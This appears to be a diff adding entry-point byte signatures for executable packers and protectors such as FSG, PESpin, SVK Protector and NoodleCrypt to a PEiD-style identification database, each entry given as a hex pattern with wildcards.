+[FSG v1.10 (Eng) -> bart/xt]
+signature = BB D0 01 40 00 BF 00 10 40 00 BE ?? ?? ?? 00 53 E8 0A 00 00 00 02 D2 75 05 8A 16 46 12 D2 C3 B2 80 A4 6A 02 5B FF 14 24 73 F7 33 C9 FF 14 24 73 18 33 C0 FF 14 24 73 21 B3 02 41 B0 10 FF 14 24 12 C0 73 F9 75 3F AA EB DC E8 43 00 00 00 2B CB 75 10 E8 38 00 00 00 EB 28 AC D1 E8 74 41 13 C9 EB 1C 91 48 C1 E0 08 AC E8 22 00 00 00 3D 00 7D 00 00 73 0A 80 FC 05 73 06 83 F8 7F 77 02 41 41 95 8B C5 B3 01 56 8B F7 2B F0 F3 A4 5E EB 96 33 C9 41 FF 54 24 04 13 C9 FF 54 24 04 72 F4 C3 5F 5B 0F B7 3B 4F 74 08 4F 74 13 C1 E7 0C EB 07 8B 7B 02 57 83 C3 04 43 43 E9 52 FF FF FF 5F BB 27 ?? ?? 00 47 8B 37 AF 57 FF 13 95 33 C0 AE 75 FD FE 07 74 EF FE 07 75 06 47 FF 37 AF EB 09 FE 07 0F 84 1A ?? ?? FF 57 55 FF 53 04 09 06 AD 75 DB 8B EC C3 1B ?? ?? 00 00 00 00 00 00 00 00 00
+ep_only = true
+
+[FSG v1.30 (Eng) -> dulek/xt]
+signature = BB D0 01 40 00 BF 00 10 40 00 BE ?? ?? ?? 00 53 E8 0A 00 00 00 02 D2 75 05 8A 16 46 12 D2 C3 B2 80 A4 6A 02 5B FF 14 24 73 F7 33 C9 FF 14 24 73 18 33 C0 FF 14 24 73 21 B3 02 41 B0 10 FF 14 24 12 C0 73 F9 75 3F AA EB DC E8 43 00 00 00 2B CB 75 10 E8 38 00 00 00 EB 28 AC D1 E8 74 41 13 C9 EB 1C 91 48 C1 E0 08 AC E8 22 00 00 00 3D 00 7D 00 00 73 0A 80 FC 05 73 06 83 F8 7F 77 02 41 41 95 8B C5 B3 01 56 8B F7 2B F0 F3 A4 5E EB 96 33 C9 41 FF 54 24 04 13 C9 FF 54 24 04 72 F4 C3 5F 5B 0F B7 3B 4F 74 08 4F 74 13 C1 E7 0C EB 07 8B 7B 02 57 83 C3 04 43 43 E9 52 FF FF FF 5F BB ?? ?? ?? 00 47 8B 37 AF 57 FF 13 95 33 C0 AE 75 FD FE 0F 74 EF FE 0F 75 06 47 FF 37 AF EB 09 FE 0F 0F 84 ?? ?? ?? FF 57 55 FF 53 04 09 06 AD 75 DB 8B EC C3 ?? ?? ?? 00 00 00 00 00 00 00 00 00
+ep_only = true
+
+[FSG v1.31 (Eng) -> dulek/xt]
+signature = BB D0 01 40 00 BF 00 10 40 00 BE ?? ?? ?? 00 53 BB ?? ?? ?? 00 B2 80 A4 B6 80 FF D3 73 F9 33 C9 FF D3 73 16 33 C0 FF D3 73 23 B6 80 41 B0 10 FF D3 12 C0 73 FA 75 42 AA EB E0 E8 46 00 00 00 02 F6 83 D9 01 75 10 E8 38 00 00 00 EB 28 AC D1 E8 74 48 13 C9 EB 1C 91 48 C1 E0 08 AC E8 22 00 00 00 3D 00 7D 00 00 73 0A 80 FC 05 73 06 83 F8 7F 77 02 41 41 95 8B C5 B6 00 56 8B F7 2B F0 F3 A4 5E EB 97 33 C9 41 FF D3 13 C9 FF D3 72 F8 C3 02 D2 75 05 8A 16 46 12 D2 C3 5B 5B 0F B7 3B 4F 74 08 4F 74 13 C1 E7 0C EB 07 8B 7B 02 57 83 C3 04 43 43 E9 58 FF FF FF 5F BB ?? ?? ?? 00 47 8B 37 AF 57 FF 13 95 33 C0 AE 75 FD FE 0F 74 EF FE 0F 75 06 47 FF 37 AF EB 09 FE 0F 0F 84 ?? ?? ?? FF 57 55 FF 53 04 89 06 AD 85 C0 75 D9 8B EC C3 ?? ?? ?? 00 00 00 00 00 00 00 00 00 88 01 00 00
+ep_only = true
+
+[FSG v1.33 (Eng) -> dulek/xt]
+signature = BE A4 01 40 00 AD 93 AD 97 AD 56 96 B2 80 A4 B6 80 FF 13 73 F9 33 C9 FF 13 73 16 33 C0 FF 13 73 1F B6 80 41 B0 10 FF 13 12 C0 73 FA 75 3C AA EB E0 FF 53 08 02 F6 83 D9 01 75 0E FF 53 04 EB 26 AC D1 E8 74 2F 13 C9 EB 1A 91 48 C1 E0 08 AC FF 53 04 3D 00 7D 00 00 73 0A 80 FC 05 73 06 83 F8 7F 77 02 41 41 95 8B C5 B6 00 56 8B F7 2B F0 F3 A4 5E EB 9D 8B D6 5E AD 48 74 0A 79 02 AD 50 56 8B F2 97 EB 87 AD 93 5E 46 AD 97 56 FF 13 95 AC 84 C0 75 FB FE 0E 74 F0 79 05 46 AD 50 EB 09 FE 0E 0F 84 ?? ?? ?? FF 56 55 FF 53 04 AB EB E0 33 C9 41 FF 13 13 C9 FF 13 72 F8 C3 02 D2 75 05 8A 16 46 12 D2 C3 ?? ?? ?? 00 00 00 00 00 00 00 00 00 54 01 00 00 ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 61 01 00 00 6F 01 00 00 00 00 00 00 00 00 00 00 00 00
+ep_only = true
+
+[NoodleCrypt v2.00 (Eng) -> NoodleSpa]
+signature = EB 01 9A E8 76 00 00 00 EB 01 9A E8 65 00 00 00 EB 01 9A E8 7D 00 00 00 EB 01 9A E8 55 00 00 00 EB 01 9A E8 43 04 00 00 EB 01 9A E8 E1 00 00 00 EB 01 9A E8 3D 00 00 00 EB 01 9A E8 EB 01 00 00 EB 01 9A E8 2C 04 00 00 EB 01 9A E8 25 00 00 00 EB 01 9A E8 02 04 00 00 EB 01 9A E8 19 07 00 00 EB 01 9A E8 9C 00 00 00 EB 01 9A E8 9C 06 00 00 E8 00 00 00 00 0F 7E F8 EB 01 9A 8B F8 C3 E8 00 00 00 00 58 EB 01 9A 25 00 F0 FF FF 8B F8 EB 01 9A 0F 6E F8 C3 8B D0 EB 01 9A 81 C2 C8 00 00 00 EB 01 9A B9 00 17 00 00 EB 01 9A C0 0A 06 EB 01 9A 80 2A 15 EB 01 9A 42 E2 EE 0F 6E C0 EB 01 9A 0F 7E C0 EB 01 9A 8B D0 00 85 EB A5 F5 65 4B 45 45 00 85 EB B3 65 07 45 45 00 85 EB 75 C7 C6 00 85 EB 65 CF 8A 00 85 EB D5 FD C0 00 85 EB 7F E5 05 05 05 00 85 EB 7F 61 06 45 45 00 85 EB 7F
+ep_only = true
+
+[PassLock 2000 v1.0 (Eng) -> Moonlight-Software]
+signature = 55 8B EC 53 56 57 BB 00 50 40 00 66 2E F7 05 34 20 40 00 04 00 0F 85 98 00 00 00 E8 1F 01 00 00 C7 43 60 01 00 00 00 8D 83 E4 01 00 00 50 FF 15 F0 61 40 00 83 EC 44 C7 04 24 44 00 00 00 C7 44 24 2C 00 00 00 00 54 FF 15 E8 61 40 00 B8 0A 00 00 00 F7 44 24 2C 01 00 00 00 74 05 0F B7 44 24 30 83 C4 44 89 43 56 FF 15 D0 61 40 00 E8 9E 00 00 00 89 43 4C FF 15 D4 61 40 00 89 43 48 6A 00 FF 15 E4 61 40 00 89 43 5C E8 F9 00 00 00 E8 AA 00 00 00 B8 FF 00 00 00 72 0D 53 E8 96 00 00 00 5B FF 4B 10 FF 4B 18 5F 5E 5B 5D 50 FF 15 C8 61 40 00 C3 83 7D 0C 01 75 3F E8 81 00 00 00 8D 83 E4 01 00 00 50 FF 15 F0 61 40 00 FF 15 D0 61 40 00 E8 3A 00 00 00 89 43 4C FF 15 D4 61 40 00 89 43 48 8B 45 08 89 43 5C E8 9A 00 00 00 E8 4B 00 00 00 72 11 66 FF 43 5A 8B 45 0C 89 43 60 53
+ep_only = true
+
+[PESpin v0.3 (Eng) -> cyberbob]
+signature = EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 B7 CD 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF E8 01 00 00 00 EA 5A 83 EA 0B FF E2 8B 95 CB 2C 40 00 8B 42 3C 03 C2 89 85 D5 2C 40 00 41 C1 E1 07 8B 0C 01 03 CA 8B 59 10 03 DA 8B 1B 89 9D E9 2C 40 00 53 8F 85 B6 2B 40 00 BB ?? 00 00 00 B9 75 0A 00 00 8D BD 7E 2D 40 00 4F 30 1C 39 FE CB E2 F9 68 3C 01 00 00 59 8D BD B6 36 40 00 C0 0C 39 02 E2 FA E8 02 00 00 00 FF 15 5A 8D 85 1F 53 56 00 BB 54 13 0B 00 D1 E3 2B C3 FF E0 E8 01 00 00 00 68 E8 1A 00 00 00 8D 34 28 B9 08 00 00 00 B8 ?? ?? ?? ?? 2B C9 83 C9 15 0F A3 C8 0F 83 81 00 00 00 8D B4 0D DC 2C 40 00
+ep_only = true
+
+[PeX v0.99 (Eng) -> bart/CrackPl]
+signature = E9 F5 00 00 00 0D 0A C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 0D 0A 20 50 65 58 20 28 63 29 20 62 79 20 62 61 72 74 5E 43 72 61 63 6B 50 6C 20 62 65 74 61 20 72 65 6C 65 61 73 65 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0D 0A C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 0D 0A 60 E8 01 00 00
+ep_only = true
+
+[Special EXE Pasword Protector v1.01 (Eng) -> Pavol Cerven]
+signature = 60 E8 00 00 00 00 5D 81 ED 06 00 00 00 89 AD 8C 01 00 00 8B C5 2B 85 FE 75 00 00 89 85 3E 77 00 00 8D 95 C6 77 00 00 8D 8D FF 77 00 00 55 68 00 20 00 00 51 52 6A 00 FF 95 04 7A 00 00 5D 6A 00 FF 95 FC 79 00 00 8D 8D 60 78 00 00 8D 95 85 01 00 00 55 68 00 04 00 00 52 6A 00 51 50 FF 95 08 7A 00 00 5D 8D B5 3F 78 00 00 6A 00 6A 00 6A 00 56 FF 95 0C 7A 00 00 0B C0 0F 84 FE 00 00 00 56 FF 95 10 7A 00 00 56 FF 95 14 7A 00 00 80 BD 3E 78 00 00 00 74 D4 33 D2 8B BD 3E 77 00 00 8D 85 1D 02 00 00 89 85 42 77 00 00 8D 85 49 02 00 00 89 85 46 77 00 00 8D 85 EB 75 00 00 89 85 4A 77 00 00 8B 84 D5 24 76 00 00 03 F8 8B 8C D5 28 76 00 00 3B 85 36 77 00 00 60 74 1F 8D B5 BD 02 00 00 FF D6 85 D2 75 11 60 87 FE 8D BD 15 78 00 00 B9 08 00 00 00 F3 A5 61 EB 15 8D 85 9F 02 00
+ep_only = true
+
+[SVK Protector v1.32 (Eng) -> Pavol Cerven]
+signature = 60 E8 00 00 00 00 5D 81 ED 06 00 00 00 EB 05 B8 06 36 42 00 64 A0 23 00 00 00 EB 03 C7 84 E8 84 C0 EB 03 C7 84 E9 75 67 B9 49 00 00 00 8D B5 C5 02 00 00 56 80 06 44 46 E2 FA 8B 8D C1 02 00 00 5E 55 51 6A 00 56 FF 95 0C 61 00 00 59 5D 40 85 C0 75 3C 80 3E 00 74 03 46 EB F8 46 E2 E3 8B C5 8B 4C 24 20 2B 85 BD 02 00 00 89 85 B9 02 00 00 80 BD B4 02 00 00 01 75 06 8B 8D 0C 61 00 00 89 8D B5 02 00 00 8D 85 0E 03 00 00 8B DD FF E0 55 68 10 10 00 00 8D 85 B4 00 00 00 50 8D 85 B4 01 00 00 50 6A 00 FF 95 18 61 00 00 5D 6A FF FF 95 10 61 00 00 44 65 62 75 67 67 65 72 20 6F 72 20 74 6F 6F 6C 20 66 6F 72 20 6D 6F 6E 69 74 6F 72 69 6E 67 20 64 65 74 65 63 74 65 64 21 21 21 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+ep_only = true
+
+[SVK Protector v1.3x (Eng) -> Pavol Cerven]
+signature = 60 E8 00 00 00 00 5D 81 ED 06 00 00 00 EB 05 B8 ?? ?? 42 00 64 A0 23 00 00 00 EB 03 C7 84 E8 84 C0 EB 03 C7 84 E9 75 67 B9 49 00 00 00 8D B5 C5 02 00 00 56 80 06 44 46 E2 FA 8B 8D C1 02 00 00 5E 55 51 6A 00 56 FF 95 0C 61 00 00 59 5D 40 85 C0 75 3C 80 3E 00 74 03 46 EB F8 46 E2 E3 8B C5 8B 4C 24 20 2B 85 BD 02 00 00 89 85 B9 02 00 00 80 BD B4 02 00 00 01 75 06 8B 8D 0C 61 00 00 89 8D B5 02 00 00 8D 85 0E 03 00 00 8B DD FF E0 55 68 10 10 00 00 8D 85 B4 00 00 00 50 8D 85 B4 01 00 00 50 6A 00 FF 95 18 61 00 00 5D 6A FF FF 95 10 61 00 00 44 65 62 75 67 67 65 72 20 6F 72 20 74 6F 6F 6C 20 66 6F 72 20 6D 6F 6E 69 74 6F 72 69 6E 67 20 64 65 74 65 63 74 65 64 21 21 21 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+ep_only = true
+
+[Video-Lan-Client -> (UnknownCompiler)]
+signature = 55 89 E5 83 EC 08 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? FF FF ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? 00
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (Microsoft Visual C++ 6.0)]
+signature = 03 DE EB 01 F8 B8 80 ?? 42 00 EB 02 CD 20 68 17 A0 B3 AB EB 01 E8 59 0F B6 DB 68 0B A1 B3 AB EB 02 CD 20 5E 80 CB AA 2B F1 EB 02 CD 20 43 0F BE 38 13 D6 80 C3 47 2B FE EB 01 F4 03 FE EB 02 4F 4E 81 EF 93 53 7C 3C 80 C3 29 81 F7 8A 8F 67 8B 80 C3 C7 2B FE EB 02 CD 20 57 EB 02 CD 20 5A 88 10 EB 02 CD 20 40 E8 02 00 00 00 C5 62 5A 4E E8 01 00 00 00 43 5A 2B DB 3B F3 75 B1 C1 F3 0D 92 B8 DC 0C 4E 0D B7 F7 0A 39 F4 B5 ?? ?? 36 FF 45 D9 FA FB FE FD FE CD 6B FE 82 0D 28 F3 B6 A6 A0 71 1F BA 92 9C EE DA FE 0D 47 DB 09 AE DF E3 F6 50 E4 12 9E C8 EC FB 4D EA 77 C9 03 75 E0 D2 D6 E5 E2 8B 41 B6 41 FA 70 B0 A0 AB F9 B5 C0 BF ED 78 25 CB 96 E5 A8 A7 AA A0 DC 5F 73 9D 14 F0 B5 6A 87 B7 3B E5 6D 77 B2 45 8C B9 96 95 A0 DC A2 1E 9C 9B 11 93 08 83 9B F8 9E 0A 8E 10 F7 85
+ep_only = true
+
+[FSG v1.20 (Eng) -> dulek/xt -> (Microsoft Visual C++ 6.0)]
+signature = C1 E0 06 EB 02 CD 20 EB 01 27 EB 01 24 BE 80 ?? 42 00 49 EB 01 99 8D 1D F4 00 00 00 EB 01 5C F7 D8 1B CA EB 01 31 8A 16 80 E9 41 EB 01 C2 C1 E0 0A EB 01 A1 81 EA A8 8C 18 A1 34 46 E8 01 00 00 00 62 59 32 D3 C1 C9 02 EB 01 68 80 F2 1A 0F BE C9 F7 D1 2A D3 EB 02 42 C0 EB 01 08 88 16 80 F1 98 80 C9 28 46 91 EB 02 C0 55 4B EB 01 55 34 44 0B DB 75 AD E8 01 00 00 00 9D 59 0B C6 EB 01 6C E9 D2 C3 82 C2 03 C2 B2 82 C2 00 ?? ?? 7C C2 6F DA BC C2 C2 C2 CC 1C 3D CF 4C D8 84 D0 0C FD F0 42 77 0D 66 F1 AC C1 DE CE 97 BA D7 EB C3 AE DE 91 AA D5 02 0D 1E EE 3F 23 77 C4 01 72 12 C1 0E 1E 14 82 37 AB 39 01 88 C9 DE CA 07 C2 C2 C2 17 79 49 B2 DA 0A C2 C2 C2 A9 EA 6E 91 AA 2E 03 CF 7B 9F CE 51 FA 6D A2 AA 56 8A E4 C2 C2 C2 07 C2 47 C2 C2 17 B8 42 C6 8D 31 88 45 BA 3D 2B BC
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (MASM32 / TASM32)]
+signature = 03 F7 23 FE 33 FB EB 02 CD 20 BB 80 ?? 40 00 EB 01 86 EB 01 90 B8 F4 00 00 00 83 EE 05 2B F2 81 F6 EE 00 00 00 EB 02 CD 20 8A 0B E8 02 00 00 00 A9 54 5E C1 EE 07 F7 D7 EB 01 DE 81 E9 B7 96 A0 C4 EB 01 6B EB 02 CD 20 80 E9 4B C1 CF 08 EB 01 71 80 E9 1C EB 02 F0 49 C1 F6 09 88 0B F7 DE 0F B6 F2 43 EB 02 CD 20 C1 E7 0A 48 EB 01 89 C1 E7 14 2B FF 3B C7 75 A8 E8 01 00 00 00 81 5F F7 D7 D9 EE 1F 5E 1E DD 1E 2E 5E 1E DC ?? ?? 5E 1E 71 06 28 1E 1E 1E 20 F0 93 23 A8 34 64 30 F0 E1 D0 9E 51 F9 C2 D1 20 1D 32 42 91 16 51 E7 1D 32 42 91 36 51 DE 1D 32 42 91 3F D1 20 5F CE 2E 1D 32 42 30 DE 91 17 93 5D C8 09 FA 06 61 1E 1E 1E 49 E9 93 2E 06 56 1E 1E 1E 09 46 CA EF 06 92 5F 31 E7 09 3A AF 66 DF FE 26 CA 06 40 1E 1E 1E 5B 1E 9B 1E 1E 91 28 9E 1A 23 91 24 A1 16 9D 95 20
+ep_only = true
+
+[FSG v1.20 (Eng) -> dulek/xt -> (MASM32 / TASM32)]
+signature = 33 C2 2C FB 8D 3D 7E 45 B4 80 E8 02 00 00 00 8A 45 58 68 02 ?? 8C 7F EB 02 CD 20 5E 80 C9 16 03 F7 EB 02 40 B0 68 F4 00 00 00 80 F1 2C 5B C1 E9 05 0F B6 C9 8A 16 0F B6 C9 0F BF C7 2A D3 E8 02 00 00 00 99 4C 58 80 EA 53 C1 C9 16 2A D3 E8 02 00 00 00 9D CE 58 80 EA 33 C1 E1 12 32 D3 48 80 C2 26 EB 02 CD 20 88 16 F7 D8 46 EB 01 C0 4B 40 8D 0D 00 00 00 00 3B D9 75 B7 EB 01 14 EB 01 0A CF C5 93 53 90 DA 96 67 54 8D CC ?? ?? 51 8E 18 74 53 82 83 80 47 B4 D2 41 FB 64 31 6A AF 7D 89 BC 0A 91 D7 83 37 39 43 50 A2 32 DC 81 32 3A 4B 97 3D D9 63 1F 55 42 F0 45 32 60 9A 28 51 61 4B 38 4B 12 E4 49 C4 99 09 47 F9 42 8C 48 51 4E 70 CF B8 12 2B 78 09 06 07 17 55 D6 EA 10 8D 3F 28 E5 02 0E A2 58 B8 D6 0F A8 E5 10 EB E8 F1 23 EF 61 E5 E2 54 EA A9 2A 22 AF 17 A1 23 97 9A 1C
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (Microsoft Visual C++ 6.0 / 7.0)]
+signature = 0B D0 8B DA E8 02 00 00 00 40 A0 5A EB 01 9D B8 80 ?? ?? 00 EB 02 CD 20 03 D3 8D 35 F4 00 00 00 EB 01 35 EB 01 88 80 CA 7C 80 F3 74 8B 38 EB 02 AC BA 03 DB E8 01 00 00 00 A5 5B C1 C2 0B 81 C7 DA 10 0A 4E EB 01 08 2B D1 83 EF 14 EB 02 CD 20 33 D3 83 EF 27 EB 02 82 53 EB 02 CD 20 87 FA 88 10 80 F3 CA EB 02 CD 20 40 03 D7 0B D0 4E 1B D2 EB 02 CD 20 2B D2 3B F2 75 AC F7 DA 80 C3 AF 91 1C 31 62 A1 61 20 61 71 A1 61 1F ?? ?? ?? 61 B4 49 6B 61 61 61 63 33 D6 66 EB 77 A7 73 33 24 13 E1 94 3C 05 14 63 60 75 85 D4 59 94 2A 60 75 85 D4 79 94 21 60 75 85 D4 82 14 63 A2 11 71 60 75 85 73 21 D4 5A D6 A0 0B 4C 3D 49 A4 61 61 61 8C 2C D6 71 49 99 61 61 61 4C 89 0D 32 49 D5 A2 74 2A 4C 7D F2 A9 22 41 69 0D 49 83 61 61 61 9E 61 DE 61 61 D4 6B E1 5D 66 D4 67 E4 59 E0 D8 63
+ep_only = true
+
+[FSG v1.20 (Eng) -> dulek/xt -> (Microsoft Visual C++ 6.0 / 7.0)]
+signature = EB 02 CD 20 EB 01 91 8D 35 80 ?? ?? 00 33 C2 68 83 93 7E 7D 0C A4 5B 23 C3 68 77 93 7E 7D EB 01 FA 5F E8 02 00 00 00 F7 FB 58 33 DF EB 01 3F E8 02 00 00 00 11 88 58 0F B6 16 EB 02 CD 20 EB 02 86 2F 2A D3 EB 02 CD 20 80 EA 2F EB 01 52 32 D3 80 E9 CD 80 EA 73 8B CF 81 C2 96 44 EB 04 EB 02 CD 20 88 16 E8 02 00 00 00 44 A2 59 46 E8 01 00 00 00 AD 59 4B 80 C1 13 83 FB 00 75 B2 F7 D9 96 8F 80 4D 0C 4C 91 50 1C 0C 50 8A ?? ?? ?? 50 E9 34 16 50 4C 4C 0E 7E 9B 49 C6 32 02 3E 7E 7B 5E 8C C5 6B 50 3F 0E 0F 38 C8 95 18 D1 65 11 2C B8 87 28 C3 4C 0B 3C AC D9 2D 15 4E 8F 1C 40 4F 28 98 3E 10 C1 45 DB 8F 06 3F EC 48 61 4C 50 50 81 DF C3 20 34 84 10 10 0C 1F 68 DC FF 24 8C 4D 29 F5 1D 2C BF 74 CF F0 24 C0 08 2E 0C 0C 10 51 0C 91 10 10 81 16 D0 54 4B D7 42 C3 54 CB C9 4E
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (Borland Delphi / Microsoft Visual C++)]
+signature = 1B DB E8 02 00 00 00 1A 0D 5B 68 80 ?? ?? 00 E8 01 00 00 00 EA 5A 58 EB 02 CD 20 68 F4 00 00 00 EB 02 CD 20 5E 0F B6 D0 80 CA 5C 8B 38 EB 01 35 EB 02 DC 97 81 EF F7 65 17 43 E8 02 00 00 00 97 CB 5B 81 C7 B2 8B A1 0C 8B D1 83 EF 17 EB 02 0C 65 83 EF 43 13 D6 83 C7 32 F7 DA 03 FE EB 02 CD 20 87 FA 88 10 EB 02 CD 20 40 E8 02 00 00 00 F1 F8 5B 4E 2B D2 85 F6 75 AF EB 02 DE 09 EB 01 EF 34 4A 7C BC 7D 3D 7F 90 C1 82 41 ?? ?? ?? 87 DB 71 94 8B 8C 8D 90 61 05 96 1C A9 DA A7 68 5A 4A 19 CD 76 40 50 A0 9E B4 C5 15 9B D7 6E A5 BB CC 1C C2 DE 6C AC C2 D3 23 D2 65 B5 F5 65 C6 B6 CC DD CC 7B 2F B6 33 FE 6A AC 9E AB 07 C5 C6 C7 F3 94 3F DB B4 05 CE CF D0 BC FA 7F A5 BD 4A 18 EB A2 C5 F7 6D 25 9F BF E8 8D CA 05 E4 E5 E6 24 E8 66 EA EB 5F F7 6E EB F5 64 F8 76 EC 74 6D F9
+ep_only = true
+
+[FSG v1.20 (Eng) -> dulek/xt -> (Borland Delphi / Microsoft Visual C++)]
+signature = 0F B6 D0 E8 01 00 00 00 0C 5A B8 80 ?? ?? 00 EB 02 00 DE 8D 35 F4 00 00 00 F7 D2 EB 02 0E EA 8B 38 EB 01 A0 C1 F3 11 81 EF 84 88 F4 4C EB 02 CD 20 83 F7 22 87 D3 33 FE C1 C3 19 83 F7 26 E8 02 00 00 00 BC DE 5A 81 EF F7 EF 6F 18 EB 02 CD 20 83 EF 7F EB 01 F7 2B FE EB 01 7F 81 EF DF 30 90 1E EB 02 CD 20 87 FA 88 10 80 EA 03 40 EB 01 20 4E EB 01 3D 83 FE 00 75 A2 EB 02 CD 20 EB 01 C3 78 73 42 F7 35 6C 2D 3F ED 33 97 ?? ?? ?? 5D F0 45 29 55 57 55 71 63 02 72 E9 1F 2D 67 B1 C0 91 FD 10 58 A3 90 71 6C 83 11 E0 5D 20 AE 5C 71 83 D0 7B 10 97 54 17 11 C0 0E 00 33 76 85 33 3C 33 21 31 F5 50 CE 56 6C 89 C8 F7 CD 70 D5 E3 DD 08 E8 4E 25 FF 0D F3 ED EF C8 0B 89 A6 CD 77 42 F0 A6 C8 19 66 3D B2 CD E7 89 CB 13 D7 D5 E3 1E DF 5A E3 D5 50 DF B3 39 32 C0 2D B0 3F B4 B4 43
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (Borland C++)]
+signature = 23 CA EB 02 5A 0D E8 02 00 00 00 6A 35 58 C1 C9 10 BE 80 ?? ?? 00 0F B6 C9 EB 02 CD 20 BB F4 00 00 00 EB 02 04 FA EB 01 FA EB 01 5F EB 02 CD 20 8A 16 EB 02 11 31 80 E9 31 EB 02 30 11 C1 E9 11 80 EA 04 EB 02 F0 EA 33 CB 81 EA AB AB 19 08 04 D5 03 C2 80 EA 33 0F B6 C9 0F BE 0E 88 16 EB 01 5F EB 01 6B 46 EB 01 6D 0F BE C0 4B EB 02 CD 20 0F BE C9 2B C9 3B D9 75 B0 EB 01 99 C1 C1 05 91 9D B2 E3 22 E2 A1 E2 F2 22 E2 A0 ?? ?? ?? E2 35 CA EC E2 E2 E2 E4 B4 57 E7 6C F8 28 F4 B4 A5 94 62 15 BD 86 95 E4 E1 F6 06 55 DA 15 AB E1 F6 06 55 FA 15 A2 E1 F6 06 55 03 95 E4 23 92 F2 E1 F6 06 F4 A2 55 DB 57 21 8C CD BE CA 25 E2 E2 E2 0D AD 57 F2 CA 1A E2 E2 E2 CD 0A 8E B3 CA 56 23 F5 AB CD FE 73 2A A3 C2 EA 8E CA 04 E2 E2 E2 1F E2 5F E2 E2 55 EC 62 DE E7 55 E8 65 DA 61 59 E4
+ep_only = true
+
+[FSG v1.20 (Eng) -> dulek/xt -> (Borland C++)]
+signature = C1 F0 07 EB 02 CD 20 BE 80 ?? ?? 00 1B C6 8D 1D F4 00 00 00 0F B6 06 EB 02 CD 20 8A 16 0F B6 C3 E8 01 00 00 00 DC 59 80 EA 37 EB 02 CD 20 2A D3 EB 02 CD 20 80 EA 73 1B CF 32 D3 C1 C8 0E 80 EA 23 0F B6 C9 02 D3 EB 01 B5 02 D3 EB 02 DB 5B 81 C2 F6 56 7B F6 EB 02 56 7B 2A D3 E8 01 00 00 00 ED 58 88 16 13 C3 46 EB 02 CD 20 4B EB 02 CD 20 2B C9 3B D9 75 A1 E8 02 00 00 00 D7 6B 58 EB 00 9E 96 6A 28 67 AB 69 54 03 3E 7F ?? ?? ?? 31 0D 63 44 35 38 37 18 87 9F 10 8C 37 C6 41 80 4C 5E 8B DB 60 4C 3A 28 08 30 BF 93 05 D1 58 13 2D B8 86 AE C8 58 16 A6 95 C5 94 03 33 6F FF 92 20 98 87 9C E5 B9 20 B5 68 DE 16 4A 15 C1 7F 72 71 65 3E A9 85 20 AF 5A 59 54 26 66 E9 3F 27 DE 8E 7D 34 53 61 F7 AF 09 29 5C F7 36 83 60 5F 52 92 5C D0 56 55 C9 61 7A FD EF 7E E8 70 F8 6E 7B EF
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (Borland Delphi / Borland C++)]
+signature = 2B C2 E8 02 00 00 00 95 4A 59 8D 3D 52 F1 2A E8 C1 C8 1C BE 2E ?? ?? 18 EB 02 AB A0 03 F7 EB 02 CD 20 68 F4 00 00 00 0B C7 5B 03 CB 8A 06 8A 16 E8 02 00 00 00 8D 46 59 EB 01 A4 02 D3 EB 02 CD 20 02 D3 E8 02 00 00 00 57 AB 58 81 C2 AA 87 AC B9 0F BE C9 80 EA 0F E8 01 00 00 00 64 59 02 D3 EB 02 D6 5C 88 16 EB 02 CD 20 46 E8 02 00 00 00 6B B5 59 4B 0F B7 C6 0B DB 75 B1 EB 02 50 AA 91 44 5C 90 D2 95 57 9B AE E1 A4 65 ?? ?? ?? B3 09 A1 C6 BF C2 C5 CA 9D 43 D6 5E ED 20 EF B2 A6 98 69 1F CA 96 A8 FA FA 12 25 77 FF 3D D6 0F 27 3A 8C 34 52 E2 24 3C 4F A1 52 E7 39 7B ED 50 42 5A 6D 5E 0F C5 4E CD 9A 08 4C 40 4F AD 6D 70 73 A1 44 F1 8F 6A BD 88 8B 8E 7C BC 43 6B 85 14 E4 B9 72 97 CB 43 FD 79 9B C6 6D AC E9 CA CD D0 10 D6 56 DC DF 55 EF 68 E7 F3 64 FA 7A F2 7C 77 05
+ep_only = true
+
+[FSG v1.20 (Eng) -> dulek/xt -> (Borland Delphi / Borland C++)]
